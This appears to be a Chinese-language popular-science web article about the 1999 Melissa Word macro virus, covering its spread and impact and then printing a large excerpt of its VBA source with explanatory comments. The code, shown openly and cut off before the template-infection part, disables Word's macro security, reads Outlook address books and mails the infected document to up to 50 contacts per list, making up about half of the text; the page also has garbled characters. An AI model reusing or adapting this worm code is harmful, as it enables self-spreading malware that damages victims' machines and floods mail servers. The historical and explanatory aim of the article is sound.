電腦病毒梅麗莎基本介紹

　　世界第二電腦病毒梅麗莎，，破壞性也極強，歐美大部分國家都受到了沖擊!學(xué)習(xí)啦小編下面為大家詳細(xì)的介紹下梅麗莎病毒!

　　梅利莎(Melissa)

　　1999年3月27日，一種隱蔽性、傳播性極大的、名為Melissa(又名“美麗殺手”)的WORD97、WORD2000宏病毒出現(xiàn)在網(wǎng)上，并以幾何級數(shù)的速度在因特網(wǎng)上飛速傳播，僅在一天之內(nèi)就感染了全球數(shù)百萬臺計算機，引發(fā)了一場前所未有的“病毒風(fēng)暴”。

　　Melissa病毒最初是在一個成人新聞組里出現(xiàn)，并為來訪用戶提供色情網(wǎng)站清單及其訪問密碼。 這個病毒專門針對微軟的電子郵件服務(wù)器和電子郵件收發(fā)軟件，它隱藏在一個WORD97格式的文件里，以附件的方式通過電子郵件傳播，善于侵襲裝有WORD97或WORD2000的計算機。它可以攻擊WORD97的注冊器并修改其預(yù)防宏病毒的安全設(shè)置，使它感染的文件所具有的宏病毒預(yù)警功能喪失作用。當(dāng)打開感染了該病毒的wORD97、WORD2000文檔時，該病毒首先感染通用模板：Nor_mal.DOT文件，并修改Windows注冊表項：HKEY_CURRENTUSER\Software\Microsoft\Office，將其增加表項： Melis_sa?，并給其賦值為：…by Kwyjibo，在OUTLOOK電子郵件程序啟動的情況下，將自動給地址簿的前50名發(fā)送信件， 該信件的主題是：“Important Message From ，該用戶名為地址簿里的已經(jīng)存放的用戶名， 信件的內(nèi)容是：Here is that document you asked for...don'show anyone else;-)，并將該信件附加一個帶毒文件，名為：list.DOC，該文檔包含大量色情網(wǎng)址。

　　由于是熟悉的人發(fā)送的，因此容易被人們忽視。同時，該病毒還會自動重復(fù)以上的動作，由此連鎖反應(yīng)，會在短時間內(nèi)，造成郵件服務(wù)器的大量阻塞，直至“淹沒”電子郵件服務(wù)器，嚴(yán)重影響人們的正常網(wǎng)絡(luò)通訊。據(jù)計算，如果Mel_issa能夠按照理論上的速度傳播，只需5次就可以讓全世界所有的網(wǎng)絡(luò)用戶都收到一份。 由于病毒自動進行自我復(fù)制，因而屬于蠕蟲類病毒。Melissa的作者顯然對此頗為得意，他在病毒代碼中寫道：“蠕蟲類?宏病毒?WORD97病毒? 還是WORD2000病毒?您們自己看著辦吧!”

　　在發(fā)現(xiàn)Melissa病毒后短短的數(shù)小時內(nèi)，該病毒即通過因特網(wǎng)在全球傳染數(shù)百萬臺計算機和數(shù)萬臺服務(wù)器， 因特網(wǎng)在許多地方癱瘓。美國YAHOO、美國在線AOL幾個大型網(wǎng)站公司，因為Melissa堵塞了他們的郵件服務(wù)系統(tǒng)， 迫使他們不能收信，也不能發(fā)信，許多公司技術(shù)人員放棄了他們的周未，以應(yīng)付這個Melissa病毒所帶來的意外情況，甚至像微軟、朗訊、英特爾、Motorola這樣的技術(shù)公司及數(shù)十所大學(xué)也不例外。對此，美國聯(lián)邦調(diào)查局、美國國家設(shè)施保護中心有史以來第二次向全國發(fā)出緊急通告，我國中央電視臺也數(shù)次報道。因特網(wǎng)是沒有國界的，這種病毒也已威脅到我國網(wǎng)絡(luò)安全，現(xiàn)在國內(nèi)用戶已有感染。

　　Melissa最令人恐怖之處，還不在于“癱瘓”郵件服務(wù)器，而是大量涉及企業(yè)和政府的核心機密有可能通過電子郵件的反復(fù)傳遞而擴散出去，甚至受損害用戶連機密被擴散到了哪里都不知道。由此看來，Melissa較之 1988年談

　　之色變的“莫里斯蠕蟲病毒”，和1998年的“BO黑客程序”，更加險惡。

　　梅利莎病毒的源代碼：

　　部分源代碼

　　下面是梅利莎病毒的部分關(guān)鍵源代碼：

　　Private Sub Document_Open()

　　On Error Resume Next

　　If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office.0\Word\Security”,“Level”) <> “”Then

　　CommandBars(“Macro”).Controls(“Security...”).Enabled = False

　　//降低Word的安全級別，使打開含有該病毒的文件時Word不報警

　　System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office.0\Word\Security”, “Level”) = 1&

　　Else

　　CommandBars(“Tools”).Controls(“Macro”).Enabled = False

　　//使Word的宏菜單上沒有編輯宏的可能

　　……

　　End If

　　Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice

　　//搜索要感染對象的E-Mail地址，并形成感染郵件，目前這一技術(shù)被網(wǎng)絡(luò)蠕蟲廣泛利用。

　　Set UngaDasOutlook = CreateObject(“Outlook.Application”)

　　Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)

　　If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “... by Kwyjibo” Then

　　If UngaDasOutlook = “Outlook” Then

　　DasMapiName.Logon “profile”, “password”

　　For y = 1 To DasMapiName.AddressLists.Count

　　Set AddyBook=DasMapiName.AddressLists(y)

　　x = 1

　　Set BreakUmOffASlice=UngaDasOutlook.CreateItem(0)

　　For oo = 1 To AddyBook.AddressEntries.Count

　　Peep = AddyBook.AddressEntries(x)

　　BreakUmOffASlice.Recipients.Add Peep

　　x = x + 1

　　If x > 50 Then oo = AddyBook.AddressEntries.Count //發(fā)送50個信件

　　Next oo

　　BreakUmOffASlice.Subject = “Important Message From ”& Application.UserName // 感染病毒的信件主題

　　BreakUmOffASlice.Body = “Here is that document you asked for ... don’t show anyone else ;-)”

　　//信件的主體

　　BreakUmOffASlice.Attachments.Add ActiveDocument.FullName //病毒信件的附件

　　BreakUmOffASlice.Send // 發(fā)送

　　Peep =“”

　　Next y

　　DasMapiName.Logoff

　　End If

　　System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”,“Melissa?”) = “... by Kwyjibo”

　　End If

　　//以下代碼感染W(wǎng)ord的模板文件或通過染毒的模板文件感染新的Word文檔

看了此文電腦病毒梅麗莎基本介紹的人還看了：

1.典型計算機病毒的相關(guān)介紹

2.著名的十大計算機病毒2016

3.電腦病毒蟲介紹

4.大電腦病毒有哪些

5.電腦病毒的發(fā)展歷程及過程